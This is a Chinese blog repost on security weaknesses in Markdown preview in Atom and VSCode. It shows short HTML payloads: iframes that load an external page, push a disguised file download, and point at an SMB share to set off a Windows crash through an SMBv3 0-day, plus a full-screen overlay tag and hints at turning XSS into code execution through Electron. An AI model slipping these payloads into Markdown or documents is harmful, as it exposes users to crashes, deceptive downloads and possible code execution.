Atom / VSCode预览我的markdown蓝屏的一种情景可能性

最新推荐文章于 2024-01-30 10:35:44 发布
最新推荐文章于 2024-01-30 10:35:44 发布
阅读量249 收藏
点赞数
文章标签: 开发工具 markdown python
原文链接:https://my.oschina.net/u/1188877/blog/856926
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

前言

默认下markdown preview对iframe/embed/svg/p等标签是解析的,对img等标签是不解析的
但是使用正常的http://是无法引入外部资源展示的。如下图

无法预览

场景

测试
<!-- 加载正常的html上js代码是无法执行的,如下图 -->
<iframe/src=http:\\tmxk.org/csrf>

iframe预览

任意文件下载
<!-- 提示用户保存文件,文件为.css文件,或者改个诱惑型比如预览插件等,如下图 -->
<iframe/src=http:\\tmxk.org/.css>

iframe下载文件

结合SMBV3 0day 蓝屏
<!-- 模拟smb服务,被动触发 -->
<iframe/src=\\1.1.1.1\>
其他小记猜想
visual code UA:
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Code/1.9.1 Chrome/53.0.2785.143 Electron/1.4.6 Safari/537.36

Atom UA:
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Atom/1.7.2 Chrome/47.0.2526.110 Electron/0.36.8 Safari/537.36

<p style="position:fixed; top:0; left:0;z-index:99999; width:100%; height:100%;background:#000;color:#fff;padding-top:30%;text-align:center;font-size:64px;">23333</p>

END

根据之前爆出的vscode的命令执行,我们是否也可以让atom做到呢?
可以仔细看下Electron与atom相关的代码,有惊喜。
注:上面的测试代码放在`之间进行预览触发,通用vscode与atom

20170808更新

能玩的还是挺多的,mark下
https://mp.weixin.qq.com/s/DgjJ6uKtuUPFQhgztL69RQ  Electron hack —— 跨平台 XSS  
https://blog.doyensec.com/2017/08/03/electron-framework-security.html  Modern Alchemy: Turning XSS into RCE

转载于:https://my.oschina.net/u/1188877/blog/856926

weixin_33743248
关注
win10用一蓝屏重启_电脑蓝屏怎么解决?电脑蓝屏怎么办?
weixin_39776344的博客
11-12 3973
Win10系统出现蓝屏现象属于比较常见问题之一,想必大家也不陌生了。如果电脑时不时出现蓝屏影响正常使用体验,引发win10电脑蓝屏的原因有很多,可能是系统问题,还可能是驱动问题,也有可能是硬件问题造成的,只有找到原因才可以解决。接下去,小编和大家说下简单解决win10蓝屏的方法。具体方法如下:1、电脑蓝屏后重启后,我们首先应该去查一下“事件查看器”看看电脑故障,非正常关机的事件日志。...
vscode win10笔记本 蓝屏_紧急!win10更新出现重大BUG
weixin_35297190的博客
12-23 843
从2020年2月份开始,微软陆续为所有win10用户推送了新的更新补丁,由于补丁BUG出现了大面积的win10用户更新后出现蓝屏,死机,休眠待机异常,电脑卡顿,黑屏,等等故障。请大家最近不要更新win10补丁,如果你的电脑还没有出现问题或者推送更新,请在设置-更新-高级选项-暂停更新 来尽量推迟更新。而如果你的电脑已经更新,并且出现了系统方面的任何异常,蓝屏,待机休眠异常,黑屏,卡顿等等。可按照...
vscode win10笔记本 蓝屏_笔记本 Win10 经常蓝屏,如何解决?
weixin_33836042的博客
12-30 404
相关文章:不慌,蓝屏而已 - Windows,蓝屏,系统 - IT之家​www.ithome.com进入安全模式禁用独立显卡(双显卡机型)或卸载显卡驱动可解决此类问题。进入安全模式的方法请参考Windows10 如何进入安全模式注意:一般在看见开机画面后长按电源键关机,短时间内重复三次左右可以进入WinRE (Windows恢复环境),但有的用户可能需要直接断开电源。如果上述方法不能解决或减轻症状...
vscode win10笔记本 蓝屏_教你win10电脑蓝屏原因排查及解决方法大全
weixin_42298093的博客
01-12 1483
相信每个人用过电脑的人都遇到过windows10蓝屏的时候,对于很多小白来说,只能按电源键重起,祈祷电脑能自己修复,不过今天,看过这篇后,希望大家对windows10蓝屏自主排查及解决有帮助,让我们开始吧。最近,很多使用win10系统的小伙伴们不带错误的代码的win10蓝屏现象,让很多小伙伴们都不知道该如何解决问题,殊不知,不同的蓝屏代码代表不同的故障点,大家不妨先了解win10系统最常见蓝屏问题...
vscode win10笔记本 蓝屏_为什么你新买的电脑容易蓝屏?可能是没这样操作
weixin_42524401的博客
12-08 204
为什么新买的电脑使用半年后,可能就出现蓝屏、卡顿的现象?大家平时也就是日常办公使用,刷刷剧、看看电影、用用office,按常理来说,不出现这样的情况,使用的软件也是正版的,那问题出在哪里呢?每个人的电脑配置不一样,参考手机出问题后,恢复出厂设置是解决问题的最快方法,电脑也一样,将系统还原到-纯净版-的win10系统是最快解决蓝屏问题的办法1、将C盘中的个人文件备份到D盘或者其他磁盘中2、点击左下...
vscode-markdown-preview-enhanced:Visual Studio Code的“最佳” markdown预览扩展之一
02-03
Markdown预览增强 和 如果您有兴趣,请尝试使用我们的新原型网络应用程序: 支持这个项目 Markdown Preview Enhanced是根据发布的一个开放源代码项目。 这些出色的的支持使它的不断发展成为可能。 您可以通过, ...
preview-vscode:Markdown和HTML for Visual Studio Code的预览
05-17
预览-vscode Markdown,重组文本,HTML,Jade,Pug,Mermaid文件,Visual Studio Code的图像URI或CSS属性的预览器 自述文件 在VSCode中编辑时可以预览Markdown,重组文本,HTML,Jade,Pug或Mermaid文件,Image的...
vscode预览markdown代码高亮
野生的小凯之博客
02-28 9675
刚开始接触markdown进行笔记整理,使用vscode预览markdown代码时,遇到没有高亮显示的情况。希望把这篇简单的分享作为我写博客的第一步,也是markdown练手。 首先我们知道在markdown中插入代码有如下三种方式 段落上的一个函数或片段的代码可以用反引号(键盘左上角的~`键)把它包起来,如: `printf()` 预览效果printf() 代码区块前使用 4 个空格或...
Markdown(.md)超详细详细贴脸教学,vscode编辑预览Markdown文件
Discowei的博客
06-23 1570
Markdown入门教学
vscode-markdown-everywhere:以任何支持vscode的行注释或块注释的语言嵌入,突出显示和预览markdown
02-23
以任何支持vscode的行注释或块注释的语言嵌入,突出显示和预览markdown。 例如,突出显示python markdown单元格/突出显示julia markdown doc字符串 Embed & Highlight preview 预览 四模式 splitter :忽略源...
vscode安装插件编写settings.json时闪退电脑蓝屏等导致vs启动时窗口一闪无法启动解决方法
qq_42197262的博客
08-20 619
cmd输入netsh winsock reset 将winsock目录重置为默认设置然后重启电脑即可回复 如果这个方法不行可以尝试卸载电脑最新版本的.net重新安装
vscode win10笔记本 蓝屏_Win10笔记本开机蓝屏提示0xc000000d怎么解决?
weixin_39957027的博客
12-20 1037
最近有Win10笔记本用户反映,电脑开机蓝屏提示“0xc000000d”,用户重启了很多遍电脑,结果都一样,这让用户非常烦恼。那么,Win10笔记本开机蓝屏提示0xc000000d怎么解决呢?接下来,针对这一问题,小编就来教教大家Win10笔记本开机蓝屏提示0xc000000d的解决方法。方法/步骤1、这种蓝屏出现的代码如下:RecoveryYour PC/Device needs to be r...
vscode导致win10蓝屏
最新发布
newton64的博客
01-30 283
在高性能笔记本Y7000P上安装vscode并安装verilog插件,时不时蓝屏,不打开vscode目前尚未出现。有时蓝屏之前vscode先报个错。
vscode win10笔记本 蓝屏_华硕笔记本,Win10蓝屏,终止代码PAGE FAULT IN NONPAGED AREA怎样解决...
weixin_39956451的博客
12-20 1040
在安全模式中卸载更新(此方法适用于Win10 1809之前的版本)在进入安全模式之前,需要先进入 Windows RE恢复模式。非正常启动三次,可进入Windows RE恢复模式。具体操作方法如下:按住电源按钮 10 秒钟以关闭设备。再次按电源按钮以打开设备。看到 Windows 启动(重启时显示ASUS的LOGO)后,立即按住电源按钮 10 秒钟关闭设备。再次按电源按钮以打开设备。在 Windo...
vscode win10笔记本 蓝屏_Win10下的vscode和golang擦出的火花
weixin_39885690的博客
12-20 246
golang是Google开发的一种静态强类型、编译型,并具有垃圾回收功能语言。他的语法和C语言相似。主要是运用在web方面。废话不多说,我们开始正文作者目前用的vscode和golang的版本分别是1.44.0和1.14.1。vscode可以在它的官网上下载,但是golang由于某些不知名的原因,我们是无法访问到的。但是国内依旧有很多的go语言的爱好者,所以大家可以在go语言的中文网下载安装和使...
vscode win10笔记本 蓝屏_电脑win10系统蓝屏怎么办? win10蓝屏怎么快速解决?
weixin_39630106的博客
01-02 259
电脑win10系统蓝屏怎么办? win10蓝屏怎么快速解决?在大家日常使用电脑时,有时候不可避免的出现开机时反复蓝屏或者黑屏,系统文件损坏而无法进入系统的现象。win10系统升级了,现在的笔记本和电脑,越来越像手机的系统,小白实际上也能解决常见的蓝屏和系统故障了,最重要的咱们有终极工具:返回厂家设置!具体出现此问题,可总结为三类原因:第三方应用软件或游戏不兼容、系统文件损坏或丢失、也有可能是硬件损...
开发周边问题_VSCode打不开
王二仙
03-07 595
蓝屏之后,VSCode打开没有任何反应。
记一次VS Code崩溃的解决(Win10扫描自动回复系统文件)
weixin_33807284的博客
08-26 1047
 早上修改Vue.js框架搭建的项目,正高兴着,突然电脑崩溃,重启后VS code打不开,报错如下: DWrite.dll丢失 然后查看了一下 C:\windows\system32\下  DWrite.dll文件还在,下面尝试重新注册 命令提示符:进到目录下,然后                      regsvr32 DWrite.dll  结果显示:   我以为,是文件损坏,重新下载,...
vscode markdown预览
09-05
一种是在VSCode中按下F1,然后输入"markdown:在侧边打开锁定的预览",即可在侧边栏打开锁定的预览窗口。 通过以上方法,你可以方便地在VSCode预览Markdown文件的效果。<span class="em">1</span>...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值